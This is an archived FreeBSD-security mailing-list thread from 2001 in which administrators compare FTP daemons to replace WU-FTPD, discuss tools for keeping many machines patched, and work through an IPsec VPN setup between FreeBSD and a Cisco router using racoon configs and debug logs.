Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 09:55 AM 11/20/01 -0500, Mitch Collinsworth wrote: >On Tue, 20 Nov 2001, Mike Tancsa wrote: > > > It too seems to be vulnerable to various security holes in the recent and > > not so recent past :-( > >Name one thing that hasn't been. The real issue, IMO, is not >having never had a security bug, but how quickly bugs are fixed >and how easy it is to apply the fixes. qmail ? Anyways, I am not looking at either bugs or zero bugs-- just less bugs. The stock ftpd that comes with FreeBSD has not had many holes for example. For the boxes I help look after, there is a real cost every time we need to upgrade the software, not to mention the risk exposure while the hole is left unpatched. x bugs a year vs x+y is a measurable difference for us. For larger networks this becomes even more acute of course. ---Mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 20 7:19:34 2001 Delivered-To: freebsd-security@freebsd.org Received: from clink.schulte.org (clink.schulte.org [209.134.156.193]) by hub.freebsd.org (Postfix) with ESMTP id C1CA737B416 for ; Tue, 20 Nov 2001 07:19:32 -0800 (PST) Received: from schulte-laptop.schulte.org (nb-65.netbriefings.com [209.134.134.65]) by clink.schulte.org (Postfix) with ESMTP id 1A44D2440B; Tue, 20 Nov 2001 09:19:28 -0600 (CST) Message-Id: <5.1.0.14.0.20011120091400.01b83e48@pop.schulte.org> X-Sender: schulte@pop.schulte.org X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Tue, 20 Nov 2001 09:19:24 -0600 To: RoBSD From: Christopher Schulte Subject: Re[2]: Fwd: Vendors For WU-FTPD Please Read Cc: security@FreeBSD.ORG In-Reply-To: <722713532.20011120150917@softhome.net> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Let's not forget ncftpd. http://www.ncftpd.com/ I've got it configured to: 1) not allow download of '/incoming/' files from ftp users 2) set local filesystem permissions to prevent other real users from reading these files There's not been one root exploit since I began using it in 1997. At 03:09 PM 11/20/2001 +0000, you wrote: >www.pureftpd.org >MC> www.proftpd.org > > >> What would be a good alternative to WU-FTPD that allows safe one way > uploads ? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 20 7:42:28 2001 Delivered-To: freebsd-security@freebsd.org Received: from cc415903-b.ebnsk1.nj.home.com (cc415903-b.ebnsk1.nj.home.com [24.180.16.158]) by hub.freebsd.org (Postfix) with SMTP id 2FDA037B405 for ; Tue, 20 Nov 2001 07:42:22 -0800 (PST) Received: (qmail 35300 invoked from network); 20 Nov 2001 15:45:35 -0000 Received: from athena.faerunhome.com (HELO athena.home.com) (192.168.0.2) by cc415903-b.ebnsk1.nj.home.com with SMTP; 20 Nov 2001 15:45:35 -0000 Message-Id: <5.1.0.14.2.20011120104126.02698ec0@netmail.home.com> X-Sender: damascus@netmail.home.com X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Tue, 20 Nov 2001 10:43:42 -0500 To: Mike Tancsa From: Carroll Kong Subject: Re: Fwd: Vendors For WU-FTPD Please Read Cc: Mitch Collinsworth , security@FreeBSD.ORG In-Reply-To: <5.1.0.14.0.20011120095853.038e9280@marble.sentex.ca> References: <5.1.0.14.0.20011120093740.038e2580@marble.sentex.ca> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 10:10 AM 11/20/01 -0500, Mike Tancsa wrote: >At 09:55 AM 11/20/01 -0500, Mitch Collinsworth wrote: > >>On Tue, 20 Nov 2001, Mike Tancsa wrote: >> >> > It too seems to be vulnerable to various security holes in the recent and >> > not so recent past :-( >> >>Name one thing that hasn't been. The real issue, IMO, is not >>having never had a security bug, but how quickly bugs are fixed >>and how easy it is to apply the fixes. > >qmail ? Anyways, I am not looking at either bugs or zero bugs-- just less >bugs. The stock ftpd that comes with FreeBSD has not had many holes for >example. For the boxes I help look after, there is a real cost every time >we need to upgrade the software, not to mention the risk exposure while >the hole is left unpatched. x bugs a year vs x+y is a measurable >difference for us. For larger networks this becomes even more acute of course. > > ---Mike >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message I have noticed that ncftpd seems to be a pretty solid ftpd in terms of a good security track record. Unfortunately, it costs a little bit for licensing. The stock ftpd with FreeBSD is indeed very good. Finally, I agree with Mike. When you start managing more and more boxes, it becomes a serious pain in the butt. You have to worry so much more (which is part of the job, but still), about sendmail or bind or wu-ftpd blowing up. It is nicer if you can get something that has a few less bugs to minimize this. -Carroll Kong To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 20 8:11:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from mercury.ccmr.cornell.edu (mercury.ccmr.cornell.edu [128.84.231.97]) by hub.freebsd.org (Postfix) with ESMTP id CBB3F37B405 for ; Tue, 20 Nov 2001 08:11:10 -0800 (PST) Received: from ruby.ccmr.cornell.edu (IDENT:0@ruby.ccmr.cornell.edu [128.84.231.115]) by mercury.ccmr.cornell.edu (8.9.3/8.9.3) with ESMTP id LAA04138; Tue, 20 Nov 2001 11:12:15 -0500 Received: from localhost (mitch@localhost) by ruby.ccmr.cornell.edu (8.9.3/8.9.3) with ESMTP id LAA03241; Tue, 20 Nov 2001 11:11:10 -0500 X-Authentication-Warning: ruby.ccmr.cornell.edu: mitch owned process doing -bs Date: Tue, 20 Nov 2001 11:11:10 -0500 (EST) From: Mitch Collinsworth X-Sender: mitch@ruby.ccmr.cornell.edu To: Carroll Kong Cc: Mike Tancsa , security@FreeBSD.ORG Subject: Re: Fwd: Vendors For WU-FTPD Please Read In-Reply-To: <5.1.0.14.2.20011120104126.02698ec0@netmail.home.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 20 Nov 2001, Carroll Kong wrote: > Finally, I agree with Mike. When you start managing more and more boxes, > it becomes a serious pain in the butt. You have to worry so much more > (which is part of the job, but still), about sendmail or bind or wu-ftpd > blowing up. It is nicer if you can get something that has a few less bugs > to minimize this. Agreed, a few less is always better than a few more. But applying security updates is part of our job as sysadmins. If you have lots of boxen to look after, you need to automate the update process. There are various approaches to this. I like cfengine. We're now experimenting with PXE and auto reinstalls. There are other good approaches besides these. -Mitch To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 20 9: 1:23 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.net2000.ch (mail.net2000.ch [62.2.252.229]) by hub.freebsd.org (Postfix) with ESMTP id 1EED337B416 for ; Tue, 20 Nov 2001 09:01:20 -0800 (PST) Received: from 2113.ch ([10.111.111.128]) by mail.net2000.ch (Netscape Messaging Server 3.5) with ESMTP id AAA1D31 for ; Tue, 20 Nov 2001 17:58:45 +0100 Message-ID: <3BFA8C66.451F0835@2113.ch> Date: Tue, 20 Nov 2001 18:01:26 +0100 From: Luc Reply-To: luc@2113.ch X-Mailer: Mozilla 4.76 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: security@FreeBSD.ORG Subject: Re: Fwd: Vendors For WU-FTPD Please Read References: <5.1.0.14.0.20011120093740.038e2580@marble.sentex.ca> <5.1.0.14.2.20011120104126.02698ec0@netmail.home.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Since everyone tell about its favorite FTPd, here is mine: muddleftpd http://www.arach.net.au/~wildfire/muddleftpd/ Muddleftpd is a new ftp server that can perform a variety of ftp tasks. It is simple to setup, fast, secure and reasonably lightweight. Cheers Luc To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 20 9:18:11 2001 Delivered-To: freebsd-security@freebsd.org Received: from sanyu1.sanyutel.com (sanyu1.sanyutel.com [216.250.215.14]) by hub.freebsd.org (Postfix) with ESMTP id 68E4837B405 for ; Tue, 20 Nov 2001 09:18:05 -0800 (PST) Received: from localhost (ksemat@localhost) by sanyu1.sanyutel.com (8.11.3/) with ESMTP id fAKHIsB28227; Tue, 20 Nov 2001 20:19:00 +0300 X-Authentication-Warning: sanyu1.sanyutel.com: ksemat owned process doing -bs Date: Tue, 20 Nov 2001 20:18:54 +0300 (EAT) From: X-X-Sender: To: Mitch Collinsworth Cc: Mike Tancsa , Subject: Re: Fwd: Vendors For WU-FTPD Please Read In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > Name one thing that hasn't been. The real issue, IMO, is not vsftpd Noah. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 20 9:24:55 2001 Delivered-To: freebsd-security@freebsd.org Received: from sanyu1.sanyutel.com (sanyu1.sanyutel.com [216.250.215.14]) by hub.freebsd.org (Postfix) with ESMTP id F382237B503 for ; Tue, 20 Nov 2001 09:24:48 -0800 (PST) Received: from localhost (ksemat@localhost) by sanyu1.sanyutel.com (8.11.3/) with ESMTP id fAKHPkU28254; Tue, 20 Nov 2001 20:25:46 +0300 X-Authentication-Warning: sanyu1.sanyutel.com: ksemat owned process doing -bs Date: Tue, 20 Nov 2001 20:25:46 +0300 (EAT) From: X-X-Sender: To: Mitch Collinsworth Cc: Carroll Kong , Mike Tancsa , Subject: Re: Fwd: Vendors For WU-FTPD Please Read In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > Agreed, a few less is always better than a few more. But applying > security updates is part of our job as sysadmins. If you have lots > of boxen to look after, you need to automate the update process. > There are various approaches to this. I like cfengine. We're now > experimenting with PXE and auto reinstalls. There are other good > approaches besides these. rdist is an interesting approach for keeping multiple machine upto date. on the note about ftp daemons. I hav been using vsftpd for some time and I am yet to hear of any security bugs. I like the simple way in which one can chroot users to their home directories by simply putting the user name in a file. Noah. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 20 11:45:58 2001 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 2D0F637B417 for ; Tue, 20 Nov 2001 11:45:56 -0800 (PST) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.11.4/8.11.4) id fAKJjP038014; Tue, 20 Nov 2001 14:45:25 -0500 (EST) (envelope-from wollman) Date: Tue, 20 Nov 2001 14:45:25 -0500 (EST) From: Garrett Wollman Message-Id: <200111201945.fAKJjP038014@khavrinen.lcs.mit.edu> To: Cc: Subject: Re: Fwd: Vendors For WU-FTPD Please Read In-Reply-To: References: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org < said: > rdist is an interesting approach for keeping multiple machine upto date. Unfortunately (and I can speak from experience) rdist's protocol is fairly brain-dead and runs in lock-step, thus dramatically bloating the time it takes to do even a null update on a large file set. If there were another option that did what rdist does, I'd switch in an instant. -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 20 12:20:20 2001 Delivered-To: freebsd-security@freebsd.org Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66]) by hub.freebsd.org (Postfix) with ESMTP id 2667A37B428 for ; Tue, 20 Nov 2001 12:20:02 -0800 (PST) Received: from caddis.yogotech.com (caddis.yogotech.com [206.127.123.130]) by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id NAA16182; Tue, 20 Nov 2001 13:19:34 -0700 (MST) (envelope-from nate@yogotech.com) Received: (from nate@localhost) by caddis.yogotech.com (8.11.6/8.11.6) id fAKKJTX10950; Tue, 20 Nov 2001 13:19:29 -0700 (MST) (envelope-from nate) From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <15354.47825.468400.219954@caddis.yogotech.com> Date: Tue, 20 Nov 2001 13:19:29 -0700 To: Garrett Wollman Cc: , Subject: Re: Fwd: Vendors For WU-FTPD Please Read In-Reply-To: <200111201945.fAKJjP038014@khavrinen.lcs.mit.edu> References: <200111201945.fAKJjP038014@khavrinen.lcs.mit.edu> X-Mailer: VM 6.96 under 21.1 (patch 14) "Cuyahoga Valley" XEmacs Lucid Reply-To: nate@yogotech.com (Nate Williams) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > < said: > > > rdist is an interesting approach for keeping multiple machine upto date. > > Unfortunately (and I can speak from experience) rdist's protocol is > fairly brain-dead and runs in lock-step, thus dramatically bloating > the time it takes to do even a null update on a large file set. If > there were another option that did what rdist does, I'd switch in an > instant. > CVSup? :) Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 20 12:24:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from mercury.ccmr.cornell.edu (mercury.ccmr.cornell.edu [128.84.231.97]) by hub.freebsd.org (Postfix) with ESMTP id 0D81237B417 for ; Tue, 20 Nov 2001 12:24:10 -0800 (PST) Received: from ruby.ccmr.cornell.edu (IDENT:0@ruby.ccmr.cornell.edu [128.84.231.115]) by mercury.ccmr.cornell.edu (8.9.3/8.9.3) with ESMTP id PAA10535; Tue, 20 Nov 2001 15:25:13 -0500 Received: from localhost (mitch@localhost) by ruby.ccmr.cornell.edu (8.9.3/8.9.3) with ESMTP id PAA23763; Tue, 20 Nov 2001 15:24:07 -0500 X-Authentication-Warning: ruby.ccmr.cornell.edu: mitch owned process doing -bs Date: Tue, 20 Nov 2001 15:24:07 -0500 (EST) From: Mitch Collinsworth X-Sender: mitch@ruby.ccmr.cornell.edu To: Garrett Wollman Cc: security@FreeBSD.ORG Subject: Re: Fwd: Vendors For WU-FTPD Please Read In-Reply-To: <200111201945.fAKJjP038014@khavrinen.lcs.mit.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 20 Nov 2001, Garrett Wollman wrote: > If > there were another option that did what rdist does, I'd switch in an > instant. http://www.iu.hio.no/cfengine/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 20 15:21: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from crack-ext.ab.videon.ca (crack-ext.ab.videon.ca [206.75.216.33]) by hub.freebsd.org (Postfix) with SMTP id 6E69037B419 for ; Tue, 20 Nov 2001 15:20:56 -0800 (PST) Received: (qmail 24474 invoked from network); 20 Nov 2001 23:20:55 -0000 Received: from unknown (HELO e6943cy62k081) ([204.209.209.221]) (envelope-sender ) by crack-ext.ab.videon.ca (qmail-ldap-1.03) with SMTP for ; 20 Nov 2001 23:20:55 -0000 Message-ID: <00c901c1721a$83fbfbd0$3531000a@shaw.ca> From: "Laurence Brockman" To: Subject: Firewall products question Date: Tue, 20 Nov 2001 16:24:34 -0700 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_00C6_01C171DF.D742F5E0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_00C6_01C171DF.D742F5E0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Heya all, I'm looking for a product (Preferably open source) that is a = firewall/vpn (Yes, I know this is all easily done in freebsd for the = most part), and here's the kicker. It has to managed through a web = interface. Any ideas? Thanks Laurence ------=_NextPart_000_00C6_01C171DF.D742F5E0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Heya all,
 
I'm looking for a product (Preferably = open source)=20 that is a firewall/vpn (Yes, I know this is all easily done in freebsd = for the=20 most part), and here's the kicker. It has to managed through a web=20 interface.
 
Any ideas?
 
Thanks
Laurence
------=_NextPart_000_00C6_01C171DF.D742F5E0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 20 16:51:23 2001 Delivered-To: freebsd-security@freebsd.org Received: from rly-ip01.mx.aol.com (rly-ip01.mx.aol.com [205.188.156.49]) by hub.freebsd.org (Postfix) with ESMTP id 4998637B417 for ; Tue, 20 Nov 2001 16:51:15 -0800 (PST) Received: from logs-tk.proxy.aol.com (logs-tk.proxy.aol.com [152.163.206.132]) by rly-ip01.mx.aol.com (8.8.8/8.8.8/AOL-5.0.0) with ESMTP id TAA28998 for ; Tue, 20 Nov 2001 19:51:01 -0500 (EST) Received: from blah (AC952FD7.ipt.aol.com [172.149.47.215]) by logs-tk.proxy.aol.com (8.10.0/8.10.0) with SMTP id fAL0oei358575 for ; Tue, 20 Nov 2001 19:50:40 -0500 (EST) Message-Id: <200111210050.fAL0oei358575@logs-tk.proxy.aol.com> Date: Wed, 21 Nov 2001 01:22:54 +0100 To: security@freebsd.org From: eberkut Subject: Re: Fwd: Vendors For WU-FTPD Please Read Organization: CNS / Minithins X-Mailer: Opera 5.11 build 904b X-Priority: 3 (Normal) Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" X-Apparently-From: SinkSuffering@aol.com Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org 20/11/01 21:24:07, Mitch Collinsworth a écrit: >> If >> there were another option that did what rdist does, I'd switch in an >> instant. > >http://www.iu.hio.no/cfengine/ even better, use cfengine with rsync through ssh for secure transfer and copying only the part that changes (cf. http://www.cs.arizona.edu/people/jdavis/cfengine.html). and you could also try Unison which is a bi-directionnal rsync-like. http://www.cis.upenn.edu/~bcpierce/unison/ --eberkut ex diffinientium cognitione diffiniti resultat cognitio . Prelude : http://prelude.sf.net . CNS : http://minithins.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 20 16:52:58 2001 Delivered-To: freebsd-security@freebsd.org Received: from default.eng.eircom.net (default.eng.eircom.net [159.134.242.160]) by hub.freebsd.org (Postfix) with SMTP id BA0CC37B417 for ; Tue, 20 Nov 2001 16:52:54 -0800 (PST) Received: (qmail 17864 invoked by uid 1000); 21 Nov 2001 00:54:17 -0000 Date: Wed, 21 Nov 2001 00:54:17 +0000 From: Dave Ryan To: freebsd-security@FreeBSD.ORG Subject: Re: Firewall products question Message-ID: <20011121005417.A32244@default.eng.eircom.net> Mail-Followup-To: Dave Ryan , freebsd-security@FreeBSD.ORG References: <00c901c1721a$83fbfbd0$3531000a@shaw.ca> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <00c901c1721a$83fbfbd0$3531000a@shaw.ca>; from l.brockman@videon.ca on Tue, Nov 20, 2001 at 04:24:34PM -0700 Organization: Eircom CIRT Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Laurence Brockman said the following on Tue, Nov 20, 2001 at 04:24:34PM -0700, > Heya all, > > I'm looking for a product (Preferably open source) that is a firewall/vpn (Yes, I know this is all easily done in freebsd for the most part), and here's the kicker. It has to managed through a web interface. > > Any ideas? www.smoothwall.org -- Dave Ryan Security Advisor dave.ryan@eircom.net Computer Incident Response Team To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 20 17:30:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from blue.blueskyfrog.com (blue.blueskyfrog.com [203.185.223.22]) by hub.freebsd.org (Postfix) with ESMTP id E40F937B41A for ; Tue, 20 Nov 2001 17:30:04 -0800 (PST) Received: from gold.internal.blueskyfrog.com ([192.168.121.34]) by blue.blueskyfrog.com with esmtp (Exim 3.12 #1 (Debian)) id 166MDD-0005AH-00 for ; Wed, 21 Nov 2001 11:30:03 +1000 Received: from ns by gold.internal.blueskyfrog.com with local (Exim 3.12 #1 (Debian)) id 166MDD-00013u-00 for ; Wed, 21 Nov 2001 11:30:03 +1000 Date: Wed, 21 Nov 2001 11:30:03 +1000 From: Nick Slager To: freebsd-security@freebsd.org Subject: KAME IPsec <--> cisco Message-ID: <20011121113003.A2610@BlueSkyFrog.COM> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org A similar message to this was posted to -security last week. I've still not made any progress on why my setup isn't working, so this is another attempt :) Trying to setup an IPsec VPN beteween a 4.4-REL box and a Cisco router. Running racoon 20010126a for key exchange. My config looks like this: 203.1.1.2 --- 203.1.1.1 --- Internet --- 203.2.2.1 --- 203.2.2.2 202.1.1.2: Host needing to talk to 203.2.2.2 203.1.1.1: FreeBSD VPN host running IPsec and racoon 203.2.2.1: Cisco 3640 router 203.2.2.2: Host with services for 203.1.1.2 Note that 203.1.1.2 and 203.2.2.2 are individual hosts, not networks. Using Ipsec in tunnel mode. As noted last week, phase 1 negotiation is not completing. However I can't see what the problem is; all looks like it is set up correctly to me. All the configuration details are below. Any help apprciated. Nick The configuration on 203.1.1.1 (FreeBSD host) is like this: /etc/ipsec.conf: flush; spdflush; spdadd 203.1.1.2/32 203.2.2.2/32 any -P out ipsec esp/tunnel/203.1.1.1-203.2.2.1/require; spdadd 203.2.2.2/32 203.1.1.2/32 any -P in ipsec esp/tunnel/203.2.2.1-203.1.1.1/require; ifconfig gif0: gif0: flags=8051 mtu 1280 tunnel inet 203.1.1.1 --> 203.2.2.1 inet 203.1.1.2 --> 203.2.2.2 netmask 0xffffff00 racoon.conf: remote 203.2.2.1 { exchange_mode aggressive,main,base; doi ipsec_doi; situation identity_only; my_identifier address 203.1.1.1; peers_identifier address 203.2.2.1; nonce_size 16; lifetime time 24 hour; # sec,min,hour initial_contact on; support_mip6 on; proposal_check obey; # obey, strict or claim proposal { encryption_algorithm des; hash_algorithm md5; authentication_method pre_shared_key ; dh_group 1; } } sainfo address 203.1.1.2 any address 203.2.2.0/32 any { pfs_group 1; lifetime time 24 hour; encryption_algorithm des, 3des, blowfish ; authentication_algorithm hmac_md5, hmac_sha1 ; compression_algorithm deflate ; } The Cisco's config is like this (203.2.2.1): crypto isakmp key **password** address 203.1.1.1 crypto map nolan 16 ipsec-isakmp set peer 203.1.1.1 set transform-set vodafone set pfs group1 match address 186 crypto ipsec transform-set vodafone esp-des esp-md5-hmac access-list 186 permit ip 203.2.2.0 0.0.0.255 host 203.1.1.2 When I try to contact 203.2.2.2 from 203.1.1.2, racoon logs the following: 2001-11-20 10:39:46: DEBUG: pfkey.c:192:pfkey_handler(): get pfkey ACQUIRE message 2001-11-20 10:39:46: DEBUG: pfkey.c:1519:pk_recvacquire(): suitable outbound SP found: 203.1.1.2/32[0] 203.2.2.0/24[0] proto=any dir=out. 2001-11-20 10:39:46: DEBUG: policy.c:183:cmpspidxstrict(): sub:0xbfbff89c: 203.2.2.0/24[0] 203.1.1.2/32[0] proto=any dir=in 2001-11-20 10:39:46: DEBUG: policy.c:184:cmpspidxstrict(): db :0x80a3a08: 203.2.2.0/24[0] 203.1.1.2/32[0] proto=any dir=in 2001-11-20 10:39:46: DEBUG: pfkey.c:1535:pk_recvacquire(): suitable inbound SP found: 203.2.2.0/24[0] 203.1.1.2/32[0] proto=any dir=in. 2001-11-20 10:39:46: DEBUG: pfkey.c:1574:pk_recvacquire(): new acquire 203.1.1.2/32[0] 203.2.2.0/24[0] proto=any dir=out 2001-11-20 10:39:46: DEBUG: proposal.c:822:printsaproto(): (proto_id=ESP spisize=4 spi=00000000 spi_p=00000000 encmode=Tunnel reqid=0:0) 2001-11-20 10:39:46: DEBUG: proposal.c:856:printsatrns(): (trns_id=DES encklen=0 authtype=1) 2001-11-20 10:39:46: DEBUG: proposal.c:856:printsatrns(): (trns_id=DES encklen=0 authtype=2) 2001-11-20 10:39:46: DEBUG: proposal.c:856:printsatrns(): (trns_id=3DES encklen=0 authtype=1) 2001-11-20 10:39:46: DEBUG: proposal.c:856:printsatrns(): (trns_id=3DES encklen=0 authtype=2) 2001-11-20 10:39:46: DEBUG: proposal.c:856:printsatrns(): (trns_id=BLOWFISH encklen=128 authtype=1) 2001-11-20 10:39:46: DEBUG: proposal.c:856:printsatrns(): (trns_id=BLOWFISH encklen=128 authtype=2) 2001-11-20 10:39:46: DEBUG: remoteconf.c:118:getrmconf(): configuration found for 203.2.2.1. 2001-11-20 10:39:46: INFO: isakmp.c:1726:isakmp_post_acquire(): IPsec-SA request for 203.2.2.1 queued due to no phase1 found. 2001-11-20 10:39:46: DEBUG: isakmp.c:811:isakmp_ph1begin_i(): === 2001-11-20 10:39:46: INFO: isakmp.c:816:isakmp_ph1begin_i(): initiate new phase 1 negotiation: 203.1.1.1[500]<=>203.2.2.1[500] 2001-11-20 10:39:46: INFO: isakmp.c:821:isakmp_ph1begin_i(): begin Aggressive mode. 2001-11-20 10:39:46: DEBUG: isakmp.c:2038:isakmp_newcookie(): new cookie: 91ee566224a1929d 2001-11-20 10:39:46: DEBUG: ipsec_doi.c:3181:ipsecdoi_setid1(): use ID type of IPv4_address 2001-11-20 10:39:46: DEBUG: oakley.c:250:oakley_dh_generate(): compute DH's private. 2001-11-20 10:39:46: DEBUG: plog.c:193:plogdump(): 5d5c8244 477c42fa 6e02f17b a808eb1a f6b85730 e22a2860 5f95b418 a1bd0dea 5e6a6c83 a44691b1 f140471a f5af3801 f7f133bb c4b064f1 008bd5c0 ab21ca63 d92f69b7 fb103832 d4cb79b0 6cd5aba0 75203e19 4893bc03 52567e98 5b1ad577 2001-11-20 10:39:46: DEBUG: oakley.c:252:oakley_dh_generate(): compute DH's public. 2001-11-20 10:39:46: DEBUG: plog.c:193:plogdump(): a72df3e6 5047891c 13bd82d3 b85cb341 b6f0ce0c 028aacba b1b34248 44cc0b38 dda955d1 d8084d69 01971b07 9e87bab8 c0e72953 e18c22a8 d880e5de eb1eb23b e291890f 02ffd197 5c753de3 2bca8a85 d4924a54 bfb09edc 39bc8c00 a69c2a52 2001-11-20 10:39:46: DEBUG: isakmp_agg.c:157:agg_i1send(): authmethod is pre-shared key 2001-11-20 10:39:46: DEBUG: isakmp.c:2155:set_isakmp_payload(): add payload of len 52, next type 4 2001-11-20 10:39:46: DEBUG: isakmp.c:2155:set_isakmp_payload(): add payload of len 96, next type 10 2001-11-20 10:39:46: DEBUG: isakmp.c:2155:set_isakmp_payload(): add payload of len 16, next type 5 2001-11-20 10:39:46: DEBUG: isakmp.c:2155:set_isakmp_payload(): add payload of len 8, next type 0 2001-11-20 10:39:46: DEBUG: isakmp.c:2290:isakmp_printpacket(): begin. 2001-11-20 10:39:46: DEBUG: sockmisc.c:424:sendfromto(): sockname 203.1.1.1[500] 2001-11-20 10:39:46: DEBUG: sockmisc.c:426:sendfromto(): send packet from 203.1.1.1[500] 2001-11-20 10:39:46: DEBUG: sockmisc.c:428:sendfromto(): send packet to 203.2.2.1[500] 2001-11-20 10:39:46: DEBUG: isakmp.c:1462:isakmp_send(): 1 times of 216 bytes message will be sent. 2001-11-20 10:39:46: DEBUG: plog.c:193:plogdump(): 91ee5662 24a1929d 00000000 00000000 01100400 00000000 000000d8 04000038 00000001 00000001 0000002c 01010001 00000024 01010000 800b0001 000c0004 00015180 80010001 80030001 80020001 80040001 0a000064 a72df3e6 5047891c 13bd82d3 b85cb341 